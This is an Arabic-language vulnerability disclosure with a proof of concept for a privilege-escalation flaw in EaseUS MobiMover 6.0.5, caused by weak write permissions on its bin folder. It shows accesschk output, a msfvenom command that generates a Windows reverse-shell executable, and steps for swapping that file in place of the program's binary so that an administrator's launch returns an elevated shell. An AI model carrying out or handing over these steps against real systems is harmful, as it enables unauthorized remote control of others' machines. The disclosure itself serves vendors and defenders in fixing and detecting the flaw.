
EaseUS MobiMover 6.0.5 Build 21620 - أذونات الملفات والمجلدات غير الآمنة
يعاني ملف MobiMoverUILaunch.exe من ثغرة رفع صلاحيات يمكن أن يستخدمها "مستخدم مُوثَّق" لتعديل الملف التنفيذي للخدمة بملف ثنائي من اختياره داخل مجلد bin. ترجع هذه الثغرة إلى مجموعة ضعيفة من الصلاحيات الممنوحة لمجموعة "المستخدمين المُوثَّقين" والتي تمنح العلم (M) المعروف بـ "صلاحية التعديل".

الصفحة الرئيسية للبائع: https://www.easeus.com/
رابط البرنامج: https://down.easeus.com/product/mobimover_trial_setup
جوجل درايف: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
فيديو الإثبات: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
إنشاء ملف ثنائي ضار على كالي لينكس باستخدام msfvenom
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
نقل الملف المُنشأ 'prepare.exe' إلى جهاز ويندوز من كالي كوصول مستخدم منخفض المستوى
نقل الملف الثنائي 'prepare.exe' المُنشأ إلى 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' لاستبدال الملف القديم كوصول مستخدم منخفض المستوى
عندما يقوم المسؤول بتشغيل التطبيق، ستحصل على شِل عكسي بصلاحيات المسؤول